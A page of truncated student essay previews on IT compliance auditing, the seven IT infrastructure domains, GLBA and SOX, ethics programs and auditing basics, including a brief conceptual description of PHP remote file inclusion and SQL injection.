...and combine them into one final report. These reports will consist of: - The two auditing frameworks or hardening guidelines / security checklists used by the DoD. - How a security assessment addressing modern day risks, threats, and vulnerabilities throughout the 7-domains of a typical IT infrastructure can help an organization achieve compliance. - How to gather and obtain needed information to perform a GLBA Financial Privacy & Safeguards Rules compliance audit and what must be covered. - The top workstation domain risks, threats, and vulnerabilities which will not only include possible causes, but mitigations as to prevent these issues from happening. - The top LAN – to – WAN risks, threats, and vulnerabilities which will not only include possible causes, but mitigations as to how we can prevent these issues from happening. - The top Remote Access Domain risks, threats, and vulnerabilities as well as ways to mitigate these types of issues. - The top Systems / Application Domain risks, threats, and vulnerabilities as well as ways to mitigate these types of issues. Part 1: Purpose: The purpose of part 1 for this lab is to develop an executive summary in regards to either the two auditing frameworks or hardening guidelines/security checklists used by the DoD. For this, I have chosen to discuss the two auditing frameworks. Background: A little background about the AF (Auditing Framework) for the DoD is that it provides a foundation for developing and representing...
Words: 2140 - Pages: 9
...Instructions 1. Construct a template that will be the guide throughout the writing process. This will improve how the document looks, feels and reads. Consistency in these three items is key to a good case study. 2. Draw your reader in with a unique title. It should attract the reader and make them want to read more. 3. Begin writing the paper. Start by identifying the problem that is being explored in the case study. 4. Explore the problem, including cause, effect and theory. Give as much background as possible. 5. Discuss the possible solution, and/or how this issue was specifically resolved. Tell what methods were used in the process. 6. Describe benefits of the study. Tell how the benefits overall affect the group to which your case study is aimed. 7. Utilize the general-to-specific-to-general approach. This is the approach to use because it draws the reader in, demonstrates a specific example, and then shows how it applies to the group as a whole. It also shows the reader how they can address their own problem this way. Tips & Warnings • Use facts and numbers where possible. This is specifically aimed at the benefits portion of the case study. Potential readers will be compelled with the numbers and how they are affected by them and remain interested. • Use photos if necessary. If photos are used, be sure they are professionally done so as to not sully the quality of the case study. • Have an executive sign off...
Words: 5555 - Pages: 23
...In the given table, you need to fill in the name of the laws, and correspondingly, fill the sector related to each law. You need to provide a rationale of compliance laws with which a public or a private organization may have to comply. |Compliance Laws |Description of Compliance Law |Rationale for Using this Law | | |This act is the result of public company account |Corporate accountability and responsibility act. | | |reform and investor protection act. | | | |This act mandate many reforms to enhance corporate | | |Sarbanes-Oxley Act (SOX) |responsibility, financial disclosure, and prevent | | | |fraud. | | |Health Insurance Portability and |Provides for helping citizens maintain their health |Health care | |Accountability Act (HIPPA) |insurance coverage. |Protection of health insurance coverage | | |Improves efficiency and effectiveness of the American...
Words: 414 - Pages: 2
...1. What is a PHP Remote File Include (RFI) attack, and why are these prevalent in today's Internet world? RFI stands for Remote File Inclusion that allows the attacker to upload a custom coded/malicious file on a website or server using a script. This vulnerability exploits the poor validation checks in websites and can eventually lead to code execution on server or code execution on website (XSS attack using javascript). RFI is a common vulnerability and all website hacking is not entirely focused on SQL injection. Using RFI you can deface the websites, get access to the server and do almost anything. What makes it more dangerous is that you only need to have your common sense and basic knowledge of PHP to execute this one. 2. What country is the top host of SQL Injection and SQL Slammer infections? Why can't the US Government do anything to prevent these injection attacks and infections? The U.S. is the top host of SQL Injection and SQL Slammer infections. Cybercriminals have made vast improvements to their infrastructure over the last few years. Its expansion is thousands of websites vulnerable to SQL Injections. Malicious code writers have exploited these vulnerabilities to distribute malware so quick that the government cannot contain such a large quantity. 3. What does it mean to have a policy of Nondisclosure in an organization? It is a contract where the parties agree not to disclose information covered by the agreement. It outlines confidential material...
Words: 1109 - Pages: 5
...Ethics, Compliance Auditing, and Emerging Issues INTERNAL MEMO TO: John Doe CEO FROM: Glen Leonard RE: Ethics Program / Training /Compliance Auditing ------------------------------------------------- DATE: February 22, 2016 This memo serves as notice that we will soon initiate efforts to develop and implement an ethics program as well as the appropriate training and an effective way to monitor those plans. As you are aware, consumers and partners want to work with companies they can trust, and having a program that will build management skills and effectively structure business controls is a great way to become transparent and build that trust. Overall, an effective ethics and compliance program will protect the organization by identifying and preventing inappropriate conduct while promoting adherence to the legal and ethical responsibilities of the organization. The core components of the proposed ethics program will include: * Establishing Standards and Procedures – this will include code of conduct, policies and procedures * Training and Education, to ensure employees are trained on the code of conduct, policies and procedures and other programs and objectives that are relevant to the program * Monitoring, Auditing and Evaluation establishing a system to detect and prevent unethical conduct and to ensure the system is effective and being adhered to. To close, with the establishment of an effective ethics programs...
Words: 1669 - Pages: 7
...Threats to Compliance With The Fundamental Principles 1. Self-interest threat – the threat that a financial or other interest will inappropriately influence the professional accountant’s judgment or behavior. Examples of the circumstances that may create self-interest threat include: a. A direct financial interest or material indirect financial interest in a client b. A loan or guarantee to or from a client or any of its directors or officers c. Undue independence on total fees from a particular client d. Concern about the possibility of losing the engagement e. Having a close business relationship with a client f. Potential employment with a client g. Contingent fees relating to an engagement 2. Self-review threat – the threat that a professional accountant will not appropriately evaluate the results of a previous judgment made or service performed in forming a conclusion about the subject matter of the engagement. Examples of the circumstances that may create self-review threat include: a. A member of the engagement team being, or having recently been, a director or officer of the firm. b. A member of the engagement team being, of having recently been, an employee of the client in a position to exert direct and significant influence over the subject matter of the engagement. c. Performing services for a client that directly affect the subject matter of the engagement. d. Preparation of original data used to generate financial...
Words: 690 - Pages: 3
...The System/ Application Domain involve servers that host server-level applications. Mail servers hand receipt and sending of e-mail. Database servers host databases that are accessed by users, applications, or other servers. DNS servers provide names to IP addresses for clients. To protect this domain the following methods should be utilized; removal of unnecessary services and protocols, changing of default passwords, regular patch and updates, enable local firewalls. The major threats to these areas are unauthorized access, hardware failure, and data loss. Since the system/ application domain consists of all of a business’s mission-critical systems, applications, and data it is important to ensure that this domain is secure at all times. Failure to do so will result in large amounts of sensitive information as well as the threat of having productions cease to function. Unauthorized physical access is gaining access to a physical entity without permission. This is potentially dangerous because if an individual were to gain such access they could destroy the systems and data within the systems. This threat is centered on access to such places as data centers with a great deal of sensitive information. To prevent unauthorized physical access policies, standards, procedures and guidelines must be followed. For example, all guest must be escorted by an employee at all times. Staff should immediately report any suspicious activity and question persons that do not have...
Words: 485 - Pages: 2
...Lab 6: Auditing the Workstation Domain for Compliance Question 1 – What are some common risks, threats, vulnerabilities commonly found in the Remote Access Domain that must be mitigated through a layered security strategy? a. Some common risks, threats, or vulnerabilities are company laptop stolen, software keyloggers being put on computers and having passwords and user accounts stolen, data leakage, and unauthorized access to the network. Question 2 – File-sharing utilities and client-to-client communication applications can provide the ability to share files with other users (i.e. Peer-to-Peer networking or Sharing). What risk and/or vulnerabilities are introduced with these applications? a. A lot of these are shared through clear text. If a user uses the same password for logging into one of these utilities as they do for their network login or any other data sensitive login the password can be easily compromised. Question 3 – Explain how confidentiality can be achieved within the Workstation Domain with security controls and security countermeasures. a. You can achieve this by using GPO’s and WMI filters. This will help push Workstation security policies to the computers such as if the computer is idle for more than 5 minutes it locks, or access to different parts of the computer like control panel are blocked. Question 4 – Explain how data integrity can be achieved within the Workstation Domain with security controls and security countermeasures. a. Security controls...
Words: 951 - Pages: 4
...A. Compliance Status The following executive summary focuses not only on the identified gaps in the current process, but also the corrective action plan to support compliance in the noted areas of the Communications Standards as provided by The Joint Commission, (National Patient Safety Goals, 2013). The high risk associated with surgical procedures performed on the wrong site has driven a risk mitigating approach to the processes involved for these procedures. The goal is to prevent harm to patients having a surgical procedure. The following summary is the current compliance status if the Priority Focus Area of Communication for Nightingale Community Hospital. After review of the specific areas identified in the Priority Focus Area, the following have been identified as requiring further attention: time-outs are routinely performed prior to every procedure (UP 01.03.01) and procedure site is marked (UP 01.02.01). Based on the evaluation of the Nightingale Community Hospital National Patient Safety Goals for Communications the current compliance rate related to the Universal Protocol Time-Out processes performed hospital wide indicate a 95% to 100% compliance rate for the year. The graph provided in the Nightingale Community Hospital National Patient Safety Goals Communication assessment provides limited information as these are hospital wide percentages. No unit specific evaluations of performance have been provided in the report. Upon review of the Site Identification and...
Words: 2795 - Pages: 12
...CODE OF ETHICS Compliance is the responsibility of all the Company’s directors, officers, managers, and employees.(Capital One,2011). One is responsible for learning the details of the policies, procedures, laws and regulations applicable to one's job and for seeking guidance when needed. It is important to avoid misconduct that violates the law, this Code, or Company policies, but also the appearance of impropriety. The point, which a subject is not explicitly explained in this Code, does not relieve an employee of their responsibility to maintain the highest ethical standards under all circumstances. If one has any concern about whether their actions or inactions could violate a law, it should be discussed with their manager. While no Code of Ethics can or should replace thoughtful behavior or common sense, it can help cultivate a culture that values and rewards honesty, integrity, and accountability. (Avon, n.d.). The principles detailed in the Code will guide in “doing the right thing” and in preserving the Company’s reputation for acting with integrity at all times. TRADE REGULATION Most states have enacted trade regulation laws to ensure fair competition. These laws prohibit price-fixing and other "anti-competitive agreements, deceptive acts, and unfair competitive methods." (Pension Consulting, n.d.). Some forms of joint activities are legally permissible, but others are not. Under no circumstances, should you illegally or improperly...
Words: 2229 - Pages: 9
...Regulatory and Compliance Issues Paper During the late 1990s and early 2000s there were a lot of companies in the USA that were involved with fraudulent activities. These are companies that were trusted by both the public and their investors. Just to mention a few of these companies like Stanford financial, WorldCom, Enron, Tyco and Madoff that intentionally and fraudulently misled their shareholders and the public. The US congress in an effort to curtail the financial scandals, the Sarbanes-Oxley Act was enacted in 2002. The Sarbanes-Oxley (SOX) Act was enacted by the United States congress to protect shareholders and the public from fraudulent accounting practices and errors. The SOX help to regulate, improve standards and also straighten corporate governance. The Sarbanes-Oxley Act facilitated the creation of an oversight company called the Public Company Accounting Oversight Board (PCAOB). “The Public Company Accounting Oversight Board (also known as the PCAOB) is a private-sector, nonprofit corporation created by the Sarbanes-Oxley Act of 2002 to oversee accounting professionals who provide independent audit reports for publicly traded companies” (http://www.sec.gov). Do you think that the creation and work of the Public Company Accounting Oversight Board (PCAOB) has resulted in greater independence of auditors of public companies? As the SOX help the establishment of the PCAOB, the US congress gave the Security and Exchange Commission (SEC) the explicit oversight authority...
Words: 1195 - Pages: 5
...INFORMATION SYSTEMS AUDITING Haryono, MCom, Ak 1 Why study Information Systems and Information Technology? • Vital component of successful businesses • Helps businesses expand and compete • Businesses use IS and IT: To improve efficiency and effectiveness of business processes For managerial decision making For workgroup collaboration IS and IT change the business process dramatically 2 IT Inside Organization 3 SIMASTERGAMA Case study: UGM UNIVERSITY ENTERPRISE SYSTEM Informasi untuk Eksekutif (Rektor, Wakil REktor, Direktur) Informasi untuk Manajer (Ka Adm, Kabag/Kasi) Academics MO DUL /AP LIK AS HR Payroll Library Accounting Informasi untuk Operasional (Front Office) I dll. Fakultas Biologi Fakultas Ekonomika dan Bisnis Fakultas ISIPOL Fakultas Farmasi Fakultas Kedokteran Fakultas Pertanian TAS KUL FA Transition of IS Governance Poor IS Governance Good IS Governance 5 Need for Audit of Information Systems 6 Information System Auditing “IS Auditing is the process of collecting and evaluating evidence to determine whether a computer system safeguards assets, maintains data integrity, allows organizational goals to be achieved effectively, and uses resources efficiently” (Weber, 1999) 7 Objectives of IS Auditing Evaluate and Improved of… asset safeguarding system efficiency IS Auditing system effectiveness data integrity 8 Information Technology Auditing IT audits: provide...
Words: 647 - Pages: 3
...CHAPTER 2 OVERVIEW OF AUDITING I. Review Questions 1. One definition of auditing is that it is a systematic process by which a competent, independent person objectively obtains and evaluates evidence regarding assertions about economic actions and events to ascertain the degree of correspondence between those assertions and established criteria and communicating the results to interested users. The Philippine Standards on Auditing (PSA) 120 “Framework of Philippine Standards on Auditing” states the objective of an audit as follows: “The objective of an audit of financial statements is to enable the auditor to express an opinion whether the financial statements are prepared in all material respects, in accordance with an identified financial reporting framework.” 2. This apparent paradox arises from the distinction between the function of auditing and the function of accounting. The accounting function is the process of recording, classifying and summarizing economic events to provide relevant information to decision makers. The rules of accounting are the criteria used by the auditor for evaluating the presentation of economic events for financial statements and he or she must therefore have an understanding of generally accepted accounting principles (GAAP), as well as generally accepted auditing standards (GAAS). The accountant need not, and frequently does not, understand what auditors do, unless he or she is involved in doing audits, or has been trained...
Words: 2252 - Pages: 10
...Central Texas Professor: Marshell J. Silva Ethics Auditing Ethics auditing by definition, an ethics audit is a “systematic evaluation of an organization’s ethics program and/or performance to determine its effectiveness.” This concept of ethics auditing is fairly new and few companies have conducted an ethics audit. However, performing such audits will likely become more mainstream as recent legislation encourages greater ethical accountability for companies to demonstrate they are abiding by the law and have established programs to improve their ethical decision making. The U.S. Sentencing Commission (the “Commission) has amended the Federal Sentencing Guidelines for Organizations (“FSGO”) whereby an effective compliance and ethics program must “exercise due diligence to prevent, detect, and report criminal conduct and otherwise promote an organizational culture that encourages ethical conduct and a commitment to compliance with all applicable law." The Commission noted there are seven minimum requirements of an effective ethics program, standards and procedures to prevent and detect criminal conduct; Responsibility at all levels of the program, together with adequate program resources and authority for its managers; Due diligence in hiring and assigning personnel to positions with substantial authority; Communicating standards and procedures, including a specific requirement for training at all levels; Monitoring, auditing, and non-retaliatory internal guidance/reporting...
Words: 691 - Pages: 3
...CHAPTER 1 Introduction to Auditing SOLUTIONS FOR REVIEW CHECKPOINTS 1-1 Auditors add credibility to financial information provided by the accountable party such as management (i.e. auditors make the financial or other information more likely to be true). Other common ways of characterizing this property of audited numbers is that the numbers are more accurate, have higher assurance, or are more reliable. These relate to different dimension of truthfulness, as we discuss later in the text. 1-2 Auditing is the verification of numbers provided by others. To attest means to lend credibility or to vouch for the truth or accuracy of the statements that one party makes to another. The attest function is a term often applied to the activities of independent PAs when acting as auditors of financial statements. Since financial statements are prepared by managers of an entity who have authority and responsibility for financial success or failure, an outsider may be skeptical that the statements are objective, free from bias, fully informative, and free from material error--intentional or inadvertent. The audit opinion of an independent-PA auditor helps resolve those doubts because the auditor's success depends upon his independent, objective, and competent assessment of the conformity of the financial statements with GAAP. The auditor's role is to lend credibility to the statements, hence the outsider will likely seek his independent audit opinion. 1-3 Client:...
Words: 1498 - Pages: 6
